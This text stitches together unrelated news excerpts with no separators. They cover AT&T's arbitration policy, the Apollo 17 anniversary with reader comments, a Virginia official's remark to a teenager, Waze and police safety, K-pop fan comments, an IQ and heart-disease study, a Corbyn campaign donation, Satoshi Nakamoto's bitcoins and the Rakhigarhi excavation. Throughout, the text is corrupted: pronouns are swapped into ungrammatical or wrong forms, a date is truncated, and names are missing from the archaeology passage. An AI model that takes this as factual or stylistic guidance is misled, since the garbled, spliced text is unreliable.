"We have been widely recognized for having one of the most consumer-friendly arbitration policies in the country—one federal court said our arbitration agreement has 'perhaps the most fair and consumer-friendly provisions this Court has ever seen,'" AT&T said. "The agreement provides strong incentives for us to resolve disputes prior to arbitration, and we resolve the vast majority before arbitration begins."
The federal court statement referenced by AT&T came from a US District Court ruling that found AT&T's "class action ban [was] unconscionable under California law," according to a Law360 article.
"Despite ruling it unconscionable, Judge Dana M. Sabraw of the US District Court for the Southern of California hailed the contract as having 'perhaps the most fair and consumer-friendly provisions that court has ever seen,'" the article said. AT&T ultimately won that case when the US Supreme Court ruled in 2011 that the Federal Arbitration Act "preempts California's rule classifying most collective-arbitration waivers in consumer contracts as unconscionable."
AT&T said that it pays consumers a $10,000 premium "if the arbitrator awards the consumer more than our final settlement offer."
The company resolves the vast majority of consumer claims before arbitration, AT&T said.
"Arbitration is always convenient for the consumer because any hearing takes place in the county where the consumer resides and, for claims under $10,000, the consumer may choose whether the arbitration will be in person, by telephone, or by written submission," AT&T said.
Ronald Evans / NASA file Earth rises above the moon's Ritz Crater in a view captured on Dec. 14, 1972, by Apollo 17's Ronald Evans.
Forty years ago today, human beings took their last steps on the moon, and had their last look at Earth framed by the lunar horizon. There have been other pictures from the moon since then, of course, but they've all been seen secondhand, based on data sent back by robotic probes. No humans have seen an Earthrise like this one with their own eyes since Apollo 17's crew began their homeward journey on Dec. 14, 1972.
For Andrew Chaikin — author of "A Man on the Moon," the definitive history of the Apollo moon effort — the 40th anniversary of our lunar farewell is a cause for reflection.
When Chaikin was a 16-year-old outer-space fanatic, they attended Apollo 17's night launch at Kennedy Space Center, thanks to a letter they wrote to their member of congress asking for a VIP pass. "It was the only part of 'Man on the Moon' that I wrote from personal experience," they told me.
Chaikin said the 12-day mission ended the Apollo program "on the highest note possible."
"By the time of Apollo 17, those guys — not just the astronauts, but the flight controllers and the planners, the whole team — they were really on top of their game," Chaikin said. "It was a spectacular mission scientifically. They landed in an absolutely spectacular place. They took some of the most memorable photographs of all the Apollo missions."
Today, Chaikin posted a video that sums up the significance of Apollo 17 as well as the importance of keeping the moon on our agenda for exploration. The five-minute clip includes an amazing view of the lunar module's ascent module rising into the sky, transmitted from a remote-control video camera that was left on the moon's surface.
Chaikin hopes that astronauts will follow through on the implied promise in the words that Apollo 17 commander Gene Cernan spoke just before climbing up from the lunar surface: "We leave as we came and, God willing, as we shall return, with peace and hope for all humankind," Cernan said.
Five days later, Cernan and their two crewmates, Harrison Schmitt and Ronald Evans, rode their command module through Earth's atmosphere and splashed down safely in the Pacific Ocean — marking the end of NASA's last round trip to the moon. Most Americans weren't even alive when that happened. So how many people living today will still be around when the next moonwalk takes place?
"I don't think we realize how exciting it's going to be when we can see the moon rise, knowing that people are living there, working to make humans a multiplanet species," Chaikin says in the video. "And when they come home, they can share with us one of the moon's most precious gifts: the sight of the earth, breathtakingly beautiful as an oasis of life in the void."
To mark the 40th anniversary of the last human footsteps on the moon, "Man on the Moon" author Andrew Chaikin looks back at Apollo 17's explorations and explains why they believe the moon is the solar system's "jewel in the crown," beckoning us to return. Watch on YouTube
Today's anniversary, recalling our species' grandest voyages, comes amid a shocking episode in Connecticut that highlights our species' violent tendencies. It was that way for the Aurora theater shootings as well, which took place on the anniversary of the Apollo 11 moon landing. Will there ever come a time when the brighter side of our nature, exemplified by the peaceful Apollo program, finally wins out over the dark side? That's one more thing to reflect on over the weekend...
Here are some of your own reflections, selected from the comments you've left over the past week on earlier installments of our Apollo 17 coverage:
Astropreneur:
"December of 2022 isn't that far away. At the rate we are going, and with the uncertainty and lack of focus we are experiencing regarding our manned space exploration program, I'm afraid the 50th anniversary of the Apollo 17 mission will pass without any new footprints having been made on the moon's surface by American astronauts. "How would our lives be today if after 20 or 30 flights the Wright brothers dismantled their airplane and no one else flew for the next 50 years? "Are we any better off now for not having continued our manned flights to the moon, and perhaps beyond? "Will we sleep forever? America must awaken or we will find ourselves trailing behind the new leaders who will pick up the torch we long ago dropped. "Awaken, American spirit of exploration! Arise as you once did so long ago! I miss you."
Elizabeth-1372999:
"That flight stood out, like the first flight to the moon. I can remember some of the highlights: a geologist looking at rocks, giving a reason to go to space beyond the Cold War; the 'blue marble' and a reminder that we are the one habitable planet in the solar system, so we had better keep this planet healthy. The 'Merry Merry Month of December' was funny, but at the time, also a little bit of concern: There was a worry that the breathing apparatus had a problem. What made them sing was the low gravity; they found it fun to skip on the moon because each jump covered a lot of distance, and that was visible on television (something the moonshot deniers should notice). "I don't think of them as the last astronauts on the moon, but the most recent. It was a shock when my daughter saw videos of Neil Armstrong's moon landing in school, and I realized that another moon landing had not happened in their life.  They are much older now, and my grandson has never seen a moon landing, and more and more funding is being cut, even though information from the space program is still coming to us. Look at the information from the asteroid projects and the xenon rocket. The space program is such a small part of our budget as is. It seems that every time budgets are cut, the space program suffers, schools suffer, and children have less and less to feel proud of."
Rick Carter:
"The next step for humankind is to become a celestial being. Short of that, humankind is destined to become just become one more extinct species in the vast cosmos. It is only by moving out into that vast cosmos that we see a true reflection of ourselves."
FarmerJeani:
"In 1969, I sat in my sister's living room with my grandmother and watched Neil Armstrong walk on the moon. My grandmother reminisced about their life as we watched. Them father took part in the run for Indian Territory in Oklahoma. They and their siblings stayed with relatives in St. Louis while their parents built a cabin to house them. They liked to stand in the window and watch the lamplighter come around with their horse and buggy to light the gas street lights. They were educated on the farm by an old Cherokee woman who had been finishing school in Europe, but forced on the long 'trail of tears' march to Indian Territory in 1838-39. They lost all of their family on the way. My great-grandfather eventually sold the farm and bought a store in town. Grandma married a farmer and moved back to Indian Territory, where they raised nine children without the benefit of electricity. All their water was carried from the creek, light was provided by kerosene lanterns and homemade candles. My children, grandchildren and great-grandchildren can never fully appreciate the grandeur of the moment as seen through my grandmother's eyes. It was an epic accomplishment and I have no doubt that we will return — to the moon and to many other worlds."
Bbbbmer:
"We truly are a great nation at times — if only we'd remember that."
Troy-2251798:
"My fear is that, in this day and age, America will go to the moon (and/or Mars) and treat it in the usual, selfish, utilitarian way. We have already screwed this planet up. Now they are considering going elsewhere. Of course, once we're there, we'll screw that up too. Here's an 'out-of-this-world' thought: Focus on population control and conservation to limit how badly we're screwing up the one and only world we're ever going to have."
EarlyOut-1524710:
"Planting a radio telescope on the far side of the moon, shielded from the radio noise generated by all of our technology, might well provide the kind of scientific bonanza that Hubble has created. "That's what's lacking in most the moon mission proposals: the promise of being able to carry out some real science. Most of the proponents of a lunar return offer little more than, 'It would be neat to go back and look around some more.' That's a little vague, given the cost and danger involved."
Pb in CA:
"Somebody explains to me why going to the surface of the moon is valuable. There is nothing there of any value.
OK, I've heard the idea of building a radio receiver on the far side. But, it would be more cost-effective to build a very-long-baseline radio receiver system using a fleet of satellites that stay in low-moon orbit, and half the time are shielded from earth radio noise. "If we are willing to accept the fact that robots are much better adapted to carrying out missions in space, then we can have a sustainable, affordable space exploration program. The Augustine Commission got it right in this regard. Personally, I have no problem in thinking of robots as extensions of humans, and saying 'we are exploring the surface of Mars' currently with Curiosity. "Here are the advantages of robots vs. humans on the moon:
- Robots can stay indefinitely - no return trip to Earth
- Energy supply is sun power - no need to take air, food and water
- Very close communication to humans back on Earth - 2.5-second round trip
- Cost of a mission is 1:2000 compared to sending humans "What is gained by sending humans?"
Cheezeweggie:
"I can't believe that we are trillions of dollars in debt and the government is seriously considering cutting health care for the elderly — but we can even consider borrowing money to go to the moon. Clean up the mess, then spend money on 'toys.' America can't afford this right now."
Stargazermom123:
"Yes, we're in bad shape here on Earth. In many ways. But we were born to look out and dream ... to explore. We went to the moon ... we have rovers on Mars, [including] one working years after it was supposed to die. Voyager 1 is reaching the end of our solar system, and will soon be beyond it — our first UFO. If we don't go back to the moon ... go to Mars ... [and] go beyond that someday, when we solve our petty differences here on Earth and put our minds to developing the mechanism to go outward into the unknown, what do we have to look forward to? What do young people have to dream about? When I stand outside on a clear night and look out at all the stars, I often wonder if anyone is looking back. Looking back and dreaming of places unknown and things never before seen, just as I am."
More about Apollo 17:
In addition to marking the 40th anniversary of Apollo 17's lunar departure, this Earthrise serves as today's offering for the Cosmic Log Space Advent Calendar, which features views of Earth from outer space on a daily basis from now until Christmas. Check out these other holiday goodies:
More space calendar entries:
A Republican elected official in Virginia told a lesbian couple's daughter that they “deserved” a father.
Rose BruMar, 15, was handing out sample ballots for the Democratic Party in Prince William County on election day earlier this month, when they ran into Supervisor Jeanine Lawson, who was greeting voters.
Lawson said that they started talking with Rose and that the teenager implied that they had two moms when they said, “One of my moms doesn't like you.”
“That caught me by surprise a bit,” Lawson said. “She told me things about their family life, and I told them in a very polite way, I said I believe children deserve a mother and a father. It was not a debate about anything.”
She's correct that it's not a debate or an argument to say something like that. It's just hatred.
Lawson said that the conversation was “pleasant and civil.” “There was nothing at all hostile about my conversation with the young lady, so much so that we continued to talk about their guitar lessons afterward,” Lawson said.
At some point, three other Republican women joined and ganged up on the teenager in a discussion about reproductive freedom.
That's when one of Rose's mothers, Evelyn, saw what was happening.
“When I walked up, lots of people were yelling, just getting aggressive,” they said. “I jumped in as soon as I got there, and told them, ‘This is not how you have a discussion with a child.'”
Now the moms want the county Board of Supervisors to censure Lawson.
“When did it become acceptable for an elected official to bully a child?” Heidi BruMar said at the board's meeting this week. “Someone is coming to unseat you in 2019… Bullying won't be tolerated in this community.”
This Story Filed Under
By Michael Fleeman
LOS ANGELES (Reuters) - Responding to the Los Angeles police chief, who complained that its popular traffic app could be misused by criminals to track officers, a spokesperson for Waze said on Tuesday that the company worked with law officers to make them safer.
Julie Mossler, head of global communications for Waze, said company officials “think very deeply about safety and security” and work closely with police and transportation departments around the world.
“These relationships keep citizens safe, promote faster emergency response and help alleviate traffic congestion,” Mossler said. “Police partners support Waze and its features, including reports of police presence, because most users tend to drive more carefully when they believe law enforcement is nearby."
Acquired by Google in 2013 for $966 million, Waze uses GPS and social networking to alert drivers to accidents, traffic snarls and the presence of police, signaled by a little cop icon on a map. It reportedly has 50 million users worldwide.
But in a letter sent to Google on Dec. 30, Los Angeles Police Chief Charlie Beck complained about the police locator feature, claiming it could be "misused by those with criminal intent to endanger police officers and the community."
In the letter, released this week, Beck also said accused gunman Ismaaiyl Brinsley had used the Waze app in the days before an ambush of New York officers Rafael Ramos and Wenjian Liu on December.
“I am confident your company did not intend the Waze app to be a means to allow those who wish to commit crimes to use the unwitting Waze community as their lookouts for the location of police officers,” Beck wrote.
Brinsley had a screenshot from the app on their Instagram account along with anti-cop slurs posted just hours before the two officers were shot dead in a parked squad car in Brooklyn, according to published reports.
But New York authorities have not directly linked the use app to the ambush.
: Star News via Naver1. [+370, -40] I hope it's a song like Twinkle Twinkle2. [+337, -31] Instead of sexy battles, girl groups should try to do innocent battles ㅋ3. [+241, -30] People forgot what type of group they used to be but Girl's Day's representative image was Twinkle Twinkle~~ cutie image. I really love that they're going back to that.4. [+184, -35] Seems male high schools will go crazy come June ㅋㅋ They went crazy with A Pink's comeback5. [+30, -2] Feels like it was yesterday they were promoting 'Something' and it's already May, ahhhhhhh6. [+32, -5] Keeping up with the sexy concept will ruin their image. Go back to the Girl's Day you used to be.7. [+24, -1] Girl's Day was the best in 2012...8. [+30, -7] It's good that they're not like other groups trying to rob an empty house
While lower intelligence scores -- as reflected by low results on written or oral tests of IQ -- have been associated with a raised risk of cardiovascular disease, no study has so far compared the relative strength of this association with other established risk factors such as obesity, smoking and high blood pressure. Now, a large study funded by Britain's Medical Research Council, which set out to gauge the relative importance of IQ alongside other risk factors, has found that lower intelligence scores were associated with higher rates of cardiovascular disease and total mortality at a greater level of magnitude than found with any other risk factor except smoking.
The findings, published in the February issue of the European Journal of Cardiovascular Prevention and Rehabilitation, are derived from the West of Scotland Twenty-07 Study, a population study designed to investigate the influence of social factors on health. The present analysis was based on data collected in 1987 in a cohort of 1145 men and women aged around 55 and followed up for 20 years. Data were collected for height, weight, blood pressure, smoking habits, physical activity, education and occupation; cognitive ability (IQ) was assessed using a standard test of general intelligence.
When the data were applied to a statistical model to quantify the associations of nine risk factors with cardiovascular mortality, results showed that the most important was cigarette smoking, followed by low IQ. Similar results were apparent when the health outcome was total mortality.
The relative strengths of the association were measured by an "index of inequality," which summarised the relative risk of a health outcome (cardiovascular death) in the most disadvantaged (high risk) people relative to the most advantaged (low risk). This relative index of inequality for the top five risk factors was found to be 5.58 for cigarette smoking, 3.76 for IQ, 3.20 for low income, 2.61 for high systolic blood pressure, and 2.06 for low physical activity.
The investigators note "a number of plausible mechanisms" whereby lower IQ scores could elevate cardiovascular disease risk, notably the application of intelligence to healthy behaviour (such as smoking or exercise) and its correlates (obesity, blood pressure). A further possibility, they add, "is that IQ denotes 'a record' of environmental insults" (eg, illness, sub-optimal nutrition) accumulated throughout life.
Commenting on the public health implications of the findings, the study's principal investigator Dr David Batty said that the individual skills reflected in a person's IQ may be important in the management of personal cardiovascular risk.
"From a public health perspective, there is the possibility that IQ can be increased, with some mixed results from trials of early learning and school readiness programmes," said Dr Batty. "It may also be worthwhile for health promotion campaigns to be planned with consideration of individual cognition levels."
They also noted that IQ may well be one important factor behind the place of social class as a fundamental determinant of inequalities in health. So far, said Dr Batty, explanations for such socio-economic gradients in health have traditionally focused on access to resources (such as education and income), physical exposures at home and at work (such as housing conditions and toxins), and health related behaviours (such as smoking and diet). But studies show that such factors do not fully explain class-based differentials in health. A low IQ, they explained, as suggested in this study, may be a further independent explanation.
The West of Scotland Twenty-07 Study is funded by the UK Medical Research Council.
Labour leader urged to explain £10,000 raised for their 2015 campaign at dinner organised by Palestinian group
A Palestinian group, whose founder once praised the militant Islamist group Hamas, held a fundraising dinner at which it collected £10,000 for Jeremy Corbyn's last leadership campaign, documents seen by the Observer reveal.
Tom Watson criticises Shami Chakrabarti peerage nomination Read more
Friends of Al-Aqsa gave Corbyn's team a cheque for £10,000 in August 2015, an investigation by this newspaper has found, although the gift has never been made public.
Corbyn's campaign said it did not declare the donation because its bank subsequently rejected the cheque as it was made out to the wrong person. Any donation above £7,500 should be declared to the Electoral Commission.
A spokesperson for Corbyn was unable to explain on Saturday what then happened to the cash raised. A spokesperson said: “I'm told a second cheque may have been sent but this was not received by the campaign.”
A spokesperson for Friends of Al-Aqsa declined to comment. The organisation was founded by Ismail Patel in 1997 to highlight the plight of Palestinians in Israel, although it has been caught up in a series of controversies. In 2009 during the bombing of Gaza by Israel, Patel told a rally: “Hamas is no terrorist organisation. The reason they hate Hamas is because they refuse to be subjugated, occupied by the Israeli state, and we salute Hamas for standing up to Israel.”
Last year the organisation's bank account was closed by the Co-op bank, which said it was not a reflection on the organisation's work, but part of due diligence to ensure accounts sending money abroad complied with anti-money laundering rules and to ensure that funds “do not inadvertently fund illegal or other proscribed activities”.
Patel was also a spokesperson for the British Muslim Initiative, an organisation that the Daily Telegraph has claimed has links to Hamas.
Only one donation from the Friends of Al-Asqa's fundraising dinner has been declared. Ibrahim Hamami, who the Telegraph has claimed is an opponent of the Oslo peace accords, and wrote in support of a wave of stabbings of Jews in Israel in 2015, gave £2,000 to Corbyn, the register of MPs' interests shows. Approached at the time by the Telegraph, they said: “I am not answering your questions. Get lost.”
John Woodcock, the Labour MP for Barrow and Furness, said: “These revelations raise incredibly serious questions about the probity of the campaign's finances and the relationship between Mr Corbyn and this organisation. We need Mr Corbyn to give full and frank explanations.”
Initially a spokesperson for Corbyn, when questioned about the £10,000 cheque, denied that it had been cashed while refusing to confirm that it had been received by the Corbyn campaign.
The spokesperson instead said that Patel had “definitely donated” along with “a couple of others” but that it had been declared, adding: “There is nothing dodgy going on.” When told that there had not been any declaration in the register of interests, the spokesperson said they had spoken in error.
The Corbyn campaign's relations with the Friends of Al-Aqsa, and reluctance to disclose details about the cheque, comes at a difficult time for the Labour leader.
Corbyn has been heavily criticised for nominating Shami Chakrabarti, the civil rights campaigner, as a Labour peer, after they delivered an independent report into the state of antisemitism in the Labour party which has been criticised by some as a whitewash.
Haras Rafiq, managing director of the Quilliam thinktank, and a former member of a government taskforce looking at countering extremism in response to the 2005 terrorist bombings in London, criticised Corbyn's relationship with Friends of Al-Aqsa. They said: “It's a reflection of the regressive left.”
Corbyn's spokesperson said that a second £5,000 cheque from an organisation called LACCA on 4 August, which was not declared, had also not been cashed because it was made out to the wrong person.
Asked who LACCA was and what had happened to that money, the spokesperson said: “Whoever LACCA are, they didn't donate.
“There is no record of another cheque being received. It was quite late in the campaign and there was no need for funds at that time.”
Bitcoin, the four-year-old virtual currency that approximates cash on the internet, now powers an economy worth more than $1 billion and is widely admired for the technical sophistication that allows it to operate without a central authority. It got its own ticker on CNBC and inspired a legion of startups. And yet, we still don't know where it came from.
Bitcoin was first introduced to the world by the pseudonymous Satoshi Nakamoto, a persona that communicated by email and in the official Bitcoin forum before abruptly disappearing. No one has ever met him, or at least no one who will admit to it. No one knows if Nakamoto is male or female. Their (or her) early emails even refer to a "we."
"It's all part of the fun."
Both The New Yorker and Fast Company tried and failed to unmask Nakamoto. The ongoing crowdsourced investigation hasn't done any better. "People analyze Satoshi's written words, trying to divine if they speak native British English, American English, or learned the language as a second language," said Jeff Garzik, a developer who works on the Bitcoin Project and emailed with Nakamoto in the early days."They analyze their posting dates, trying to guess their local time zone. It's all part of the fun."
But two weeks ago, programmer Sergio Demian Lerner discovered something new about Nakamoto.
Bitcoin is designed to mimic gold in some ways. Anyone can "mine" for new Bitcoins by running the Bitcoin client. The process is designed to get more difficult as more people start mining. At first, the client could create 50 Bitcoins in an hour running on an average laptop. It now takes a day to generate three Bitcoins using a powerful machine that does nothing else.
It was generally assumed that Nakamoto has been mining Bitcoins since the very beginning and probably owned a large amount. But if Lerner's analysis is correct, Nakamoto is likely hoarding an eye-popping fortune of almost a million Bitcoins, worth more than $100 million at today's market price.
The Bitcoin protocol creates a public ledger as Bitcoins are generated and exchanged, which produces a receipt for every transaction and prevents coins from being spent twice. By examining this ledger, Lerner deduced that Nakamoto has only spent around .0005 percent of their fortune, or about 500 Bitcoins, over the last four years.
Nakamoto is likely hoarding an eye-popping fortune of almost a million Bitcoins
There is some disagreement over whether Lerner's numbers are correct, but the experts The Verge consulted all said the basic gist was accurate: there is an entity that has amassed a large fortune in Bitcoin, and that entity is probably Nakamoto. "Sergio's latest detective work is technically sound," Gavin Andresen, the Bitcoin developer who took over for Nakamoto, said in an email. "It sure looks like one person (or group of cooperating people) mined about a million bitcoins in 2009, and the most likely suspect is Satoshi."
Bitcoin was introduced to the world in 2008 in an academic paper that was emailed to the Cryptography and Cryptography Policy Mailing List. Nakamoto started emailing with individual programmers who took an interest, and then began posting on the Bitcoin forum. Their communications were overwhelmingly technical, never personal, and always in text.
In April of 2011, Nakamoto emailed Andresen to say that the Bitcoin Project developers "should try to de-emphasize the whole ‘mysterious founder' thing when talking publicly about Bitcoin." No one has heard from them since.
Lerner's analysis includes more information than has ever been revealed about Bitcoin's elusive inventor. It also provides a new starting point for those who want to discover Nakamoto's real identity. The Nakamoto-entity did make some transactions, each of which has the potential to reveal more clues. Lerner noted this in a blog post announcing their findings. "If the real name of the sender of a single transaction belonging to the entity is identified, then Satoshi's mystery identity will be revealed," they wrote. "I bet that this will happen in the days following this post." (It hasn't, yet: the difficulty of tracing transactions back to a name is one of Bitcoin's most popular features.)
By Bitcoin logic, Nakamoto's identity shouldn't matter
But by Bitcoin logic, Nakamoto's identity shouldn't matter. Bitcoin was designed to substitute technology for trust. "What is needed is an electronic payment system based on cryptographic proof instead of trust, allowing any two willing parties to transact directly with each other without the need for a trusted third party," Nakamoto wrote in the original Bitcoin white paper.
That doesn't change the fact that people still want to know.
"I'm as curious as I was back then, probably even more curious," said Joshua Davis, who spent four months trying to find Nakamoto for a piece in The New Yorker in October 2011. "Every time I see a news post about the rise of the value of the Bitcoin, I wonder if Satoshi is seeing that too. What's they thinking? Are they proud? Are they thinking that, at some point, some day, he'll finally reveal himself? Imagine 15, 20 years down the line. The world has now really adopted Bitcoin. It is a viable currency. At that point will Satoshi, on their death bed, say, ‘It was me'?"
New Indus Valley study
Haryana
Rakhigarhi
Mohenjo-daro
Hisar
Indus Valley Civilisation
Deccan College
Haryana Archaeological Department
Vasant Shinde
vice–chancellor
Indus Valley
Seoul National University
Banani Bhattacharyya
Amarender Nath
ASI
Mayank Vahia
Tata Institute of Fundamental Research
TIFR
VASANT
Move over Mohenjo-daro, Haryana'sdistrict is the new seat of vastness for the. Researchers from citybasedPost-Graduate and Research Institute, in collaboration with the, have dug out a site at Rakhigarhi village in Hisar almost twice the size of its popular cousin in Pakistan.“The Rakhigarhi site spreads across 550 hectares whereas Mohenjo-daro spans 300 hectares, making the former the largest Harappan settlement. These are our latest findings from the excavation going on at that site, where we have measured the area in order to fathom the extent of its spread,” shared Drat Deccan College, who is working on the site along with their team. They stressed that it is an important finding in history and work is still on to understand more about the site.Before this, Shinde said there was much conjecture about the site's area, with estimates running between 50 and around 200 hectares. But, the research reports of the team led by Deccan College a couple of years ago indicated that the site was much larger, covering more than 350 hectares. Now, the size has been pegged at 550 hectares. The area has a total of seven mounds, of which excavations have been carried out on two mounds. Work on the remaining mounds is still in progress.“At places where the remains were discovered, we used various scientific instruments to ascertain whether the area could be called a part of theCivilisation. We are still deciphering how the site developed and how the architecture spread out. We also found a cemetery there and are also studying the DNA of the people buried, in collaboration with. The DNA analysis will give us more insights into the origins of the people. Even their facial structure can be modelled through 3D reconstruction. The site is extremely important and can be developed into a veritable tourist destination,” Shinde added.Speaking to Mirror, Dr, the deputy director of the Directorate of Archaeology and Museums, Government of Haryana, offered, “We have been working on this for a while now. The present findings have pegged the total area of the Rakhigarhi site at 550 hectares, which makes it the largest Harappan site discovered today in the Indian sub-continent. More excavations are being carried out to find out details about the seven mounds. Mounds two and seven have been dug up so far.”The site had been first excavated byof the Archeological Survey of India () in 1998, 1999 and 2000. The findings had revealed a mature Harappan phase, characterised by planned township with mud, brick and burnt brick constructions and a proper drainage system in place. Thereafter, there have been various researches on the site, including the present findings.Tejas Garge, a Mizoram-based archaeologist with ASI who has worked on the Indus Valley Civilisation, said it's no surprise that the site covers such a vast area. “There were five big sites, or what can be called as metropolitan cities in modern parlance, in the Indus Valley Civilisation. Rakhigarhi was one of them. The others were Mohenjo-daro, Dholavira, Ganeriwala and Harappa. In addition, there were around 3,000 villages that were part of the civilisation,” they said., a researcher from) who has also worked extensively on the excavations related to the civilisation, added, “The site is extremely promising. When I went there two years ago, work was already under way. Very little has been discovered on this site yet, but it looks like one of the peak settlements. The government should put in added resources and the excavations should be done with more vigour to uncover further details about this place.”█ At places where the remains were discovered, we used various scientific instruments to ascertain if the area could be called a part of the Indus Valley Civilisation
